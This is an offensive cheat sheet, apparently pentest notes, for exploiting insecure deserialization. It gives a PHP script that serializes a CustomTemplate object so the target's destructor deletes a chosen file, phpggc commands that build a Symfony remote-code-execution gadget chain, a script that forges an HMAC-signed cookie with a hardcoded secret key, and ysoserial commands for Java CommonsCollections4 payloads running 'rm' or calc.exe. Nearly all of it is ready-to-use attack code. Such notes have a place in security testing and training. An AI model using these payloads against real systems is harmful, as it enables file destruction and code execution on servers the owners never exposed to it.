Insecure Deserialization
Manual and gadget chain manipulation
PHP
Manual serialization
Manual serialization, overriding a class's internal members (requires access to the application's source code) in order to reach specific functionality, here the file deletion performed in a destructor.
<?php
// The app's class definition deletes the file named by a property in its
// destructor (__destruct()); the object is instantiated from the "session" cookie.
class CustomTemplate {
    // the property must be public: protected/private names are mangled with
    // NUL bytes in the serialized form and would not match the app's definition
    public $template_file_path;
}
$c = new CustomTemplate();
$c->template_file_path = "/path/file-to-delete.txt";
// final serialized PHP object (string lengths are byte counts)
echo serialize($c);
/* output
O:14:"CustomTemplate":1:{s:18:"template_file_path";s:24:"/path/file-to-delete.txt";}
*/
?>
PHPGGC
Automatic gadget chain generation when no source code review is possible (the target must use a framework or library for which a chain exists; ./phpggc -l lists them).
git clone https://github.com/ambionics/phpggc.git
cd phpggc
./phpggc symfony/rce4 exec 'rm /path/file-to-delete.txt' | base64 -w 0
SHA1-HMAC - PHP signed gadget chain (only works when the application's secret key is known, e.g. leaked from its source code)
<?php
// paste the base64-encoded phpggc output here
$phpggc_object = "<base64 phpggc payload>";
$secretKey = "mx557o5crourg7j9hrmve29bdb60dfsn";
$cookie = urlencode('{"token":"' . $phpggc_object . '","sig_hmac_sha1":"' . hash_hmac('sha1', $phpggc_object, $secretKey) . '"}');
echo $cookie;
?>
Java
// the repository ships no prebuilt jar: build it with maven or fetch a snapshot
git clone https://github.com/frohoff/ysoserial.git
// prebuilt snapshot jar
wget https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
// usage: java -jar <jar> <gadget chain> '<command>' (chains target the libraries on the victim's classpath, e.g. commons-collections4)
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 calc.exe
java -jar ./ysoserial-master-SNAPSHOT.jar CommonsCollections4 'rm /path/file-to-delete.txt' | base64 -w0
// run with Java 8 where possible; newer JDKs need --add-opens flags for the reflective gadgets
.NET
git clone https://github.com/pwntester/ysoserial.net.git